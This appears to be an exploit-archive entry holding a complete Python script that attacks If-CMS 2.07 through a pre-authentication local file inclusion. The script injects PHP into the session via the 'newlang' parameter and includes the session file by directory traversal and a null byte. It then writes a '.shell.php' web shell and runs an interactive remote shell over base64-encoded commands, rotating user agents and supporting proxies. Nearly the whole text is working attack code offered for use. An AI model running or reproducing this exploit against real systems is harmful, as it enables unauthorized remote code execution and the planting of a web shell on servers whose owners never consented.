ExploitFixes
If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit 2011-03-15 17:15:06

#!/usr/bin/python
# ~INFORMATION
# Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
# Author: TecR0c
# Date: 13/3/2011
# Software link: http://bit.ly/hh9ZB4
# Tested on: Linux bt
# Version: 2.07
# PHP.ini Settings: gpc_magic_quotes = Off

import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
from optparse import OptionParser
from urlparse import urlparse,urljoin
from urllib import urlopen
from cookielib import CookieJar

__CONTACT__ ="TecR0c([email protected])"
__DATE__ ="13.3.2011"

usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__
parser = OptionParser(usage=usage)
parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",
help="HTTP Proxy <server>:<port>")

(options, args) = parser.parse_args()

if options.proxy:
print '[+] Using Proxy'+options.proxy

# User Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
"Google Chrome 0.2.149.29 (Windows XP)",
"Opera 9.25 (Windows Vista)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Opera/8.00 (Windows NT 5.1; U; en)"]
agent = random.choice(agents)

traversal = '../../../../../../../../../../../..'
sessionLocation = '/var/lib/php5/'

def banner():
if os.name == "posix":
os.system("clear")
else:
os.system("cls")
header = '''
|----------------------------------------|
|Exploit: If-CMS 2.07 LFI RCE
|Author: %s
|Date: %s
|----------------------------------------|\n
'''%(__CONTACT__,__DATE__)
for i in header:
print "\b%s"%i,
sys.stdout.flush()
time.sleep(0.005)

def injectPayload():
webSiteUrl = url.geturl()+'index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>'
try:
opener.open(webSiteUrl)
except:
print '[-] Failed'

def proxyCheck():
if options.proxy:
try:
h2 = httplib.HTTPConnection(options.proxy)
h2.connect()
print "[+] Using Proxy Server:",options.proxy
except(socket.timeout):
print "[-] Proxy Timed Out\n"
pass
sys.exit(1)
except(NameError):
print "[-] Proxy Not Given\n"
pass
sys.exit(1)
except:
print "[-] Proxy Failed\n"
pass
sys.exit(1)

def getProxy():
try:
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print "\n[-] Proxy Timed Out"
sys.exit(1)
return proxy_handler

cj = CookieJar()
if options.proxy:
opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
else:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', agent)]

def postRequestWebShell(encodedCommand):
webSiteUrl = url.geturl()+'.shell.php'
commandToExecute = [
('cmd',encodedCommand)]
cmdData = urllib.urlencode(commandToExecute)
try:
response = opener.open(webSiteUrl, cmdData).read()
except:
print '[-] Failed'
sys.exit()
return response

def writeOutShell(encodedCommand):
cookieString = str(cj)
cookieSearch = re.compile(r"PHPSESSID=(.*) f")
session_value = cookieSearch.search(cookieString)
if session_value:
session_value = session_value.group(1)
cj.clear()
webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00'
try:
opener.open(webSiteUrl)
except:
print '[-] Failed'
sys.exit()

def commandLine():
encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"
encodedCommand = base64.b64encode(encodedCommand)
writeOutShell(encodedCommand)
commandLine = ('[RSHELL] %[email protected]%s# ') % (getpass.getuser(),url.netloc)
while True:
try:
command = raw_input(commandLine)
encodedCommand = base64.b64encode(command)
response = postRequestWebShell(encodedCommand)
print response
except KeyboardInterrupt:
encodedCommand = base64.b64encode('rm .shell.php')
postRequestWebShell(encodedCommand)
print "\n[!] Removed .shell.php\n"
sys.exit()

if "__main__" == __name__:
banner()
try:
url=urlparse(args[0])
except:
parser.print_help()
sys.exit()
getProxy()
proxyCheck()
injectPayload()
commandLine()